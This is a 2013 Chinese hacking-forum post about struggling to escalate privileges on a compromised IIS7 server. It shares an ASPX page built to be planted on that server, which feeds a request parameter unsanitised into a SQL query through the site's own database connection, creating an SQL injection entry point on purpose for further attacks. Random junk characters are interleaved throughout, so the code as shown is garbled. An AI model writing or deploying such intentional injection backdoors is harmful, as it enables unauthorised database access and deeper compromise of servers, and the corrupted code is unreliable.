昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
& c3 C1 W0 f( b) `其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。6 @1 x+ s& I( d, d
代码量不多,自己写个拉倒了。烦死了。
+ R: p, a0 v3 `) Y* w# ]
0 j- I! O/ L5 M2 ^+ L
$ g E: D1 `7 H! m<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">, d' V' p# x( i6 W5 p: a
<html xmlns="http://www.w3.org/1999/xhtml">
% j4 ?6 d, @/ n7 E: [$ l K<head runat="server"># H. `% n$ q6 I6 y2 ?
<title>暗影aspx构造注射专用页面</title>
3 h% E) O2 m# m</head>1 a) M# H. \8 Y1 y0 @6 G* `1 {1 {
<body>
0 U! X D2 G! h% C/ u( s, y+ K <form id="form1" runat="server">
& _3 D. `) v9 a2 b9 n' `* }* t5 Z <div>; }4 ^3 P) q* l% l& s
<script language="c#" runat="server">8 J& n- }" s9 Z( r
5 i; M9 T9 B' ^
void page_init(object sender, EventArgs e)
& f9 y* g' ?1 j {
9 H/ |% `0 `- K; }- y: X$ P0 C : p& E# w+ @- P$ r1 w) P# m. a! C
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();, |3 f0 X3 Q7 T W
: |2 ]) q8 [) w4 M
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();/ L2 f0 g1 I E
conn.Open();
; {% J- D" Y, B
6 k9 Q/ L+ H0 N, m. ?, I, f. l+ Q( W string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
X8 Y: G& R" Q/ n0 ~& v3 N! O # J$ w7 R9 s" g3 f% c3 X
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
4 ~. G5 m6 M8 e3 D6 c9 K int x = command.ExecuteNonQuery();% O5 \) g) I/ T. E
Response.Write(i+"\n");; S! b' L( w! F
Response.Write(x);! C$ T G% @; |4 h6 p+ x @0 W
conn.Close();
) B4 }$ Z* j1 U8 U- K) Q }
! A, \# s4 u6 f
) `. y* m" d4 J </script>) T }3 b% v& b
</div>
: p) j7 ]; r$ }* S0 C </form>9 `. k6 v) o. N2 R9 _# m
</body>4 ^# \, u) B' P& N! R' {1 `& M$ ]
</html>: r% \8 D1 X2 K
|
发表于 2013-3-20 21:32:01
收藏
分享
支持
反对